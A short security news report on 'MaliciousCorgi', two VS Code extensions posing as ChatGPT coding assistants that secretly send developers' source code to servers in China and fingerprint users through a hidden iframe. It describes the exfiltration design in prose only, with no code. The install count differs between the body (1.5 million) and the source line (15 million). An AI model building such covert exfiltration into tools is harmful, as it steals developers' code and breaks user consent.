Security experts have identified two functional but malicious VS Code extensions disguised as AI coding tools that are secretly exfiltrating developer source code to Chinese servers. Despite their legitimate features, these tools—which have over 1.5 million combined installs—systematically capture and transmit every file edit and workspace modification without user consent.
Cybersecurity researchers have uncovered a sophisticated spying campaign dubbed MaliciousCorgi involving two popular Microsoft Visual Studio Code extensions. These extensions, titled ChatGPT - 中文版 and ChatGPT - ChatMoss, present themselves as helpful AI-powered coding assistants. While they successfully provide the promised autocomplete and debugging features, they secretly harbor spyware designed to siphon sensitive data from unsuspecting developers.
The danger of this campaign lies in its high level of functionality, which prevents users from becoming suspicious. Because the tools work exactly as advertised, providing accurate code suggestions and error explanations, they avoid the common red flags associated with malware. Under the surface, however, identical malicious code in both extensions monitors every file a developer opens.
The technical mechanism for this data theft is aggressive and near-constant. Every time a user makes a modification to their source code, the extension reads the entire content of the file, encodes it into a Base64 format, and transmits it to a specific server located in China. This ensures that the attackers have a real-time mirror of the developer's intellectual property and proprietary projects.
In addition to tracking active edits, these extensions feature a remote monitoring capability that allows the command server to trigger a mass exfiltration of up to fifty files from the workspace at once. To further compromise user privacy, the extensions utilize a hidden zero-pixel iframe. This invisible element loads four different commercial analytics kits—Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics—to fingerprint the user's device and build a comprehensive profile.
Both extensions remain available on the official Visual Studio Marketplace despite having a combined total of over 1.5 million installations. Researchers warn that the infrastructure behind these tools is identical, suggesting a coordinated effort to harvest global developer data through the guise of a convenient AI productivity tool. This discovery highlights the growing risk of using third-party extensions in sensitive development environments.
Source: Malicious VS Code AI Extensions With 15 Million Installs Steal Source Code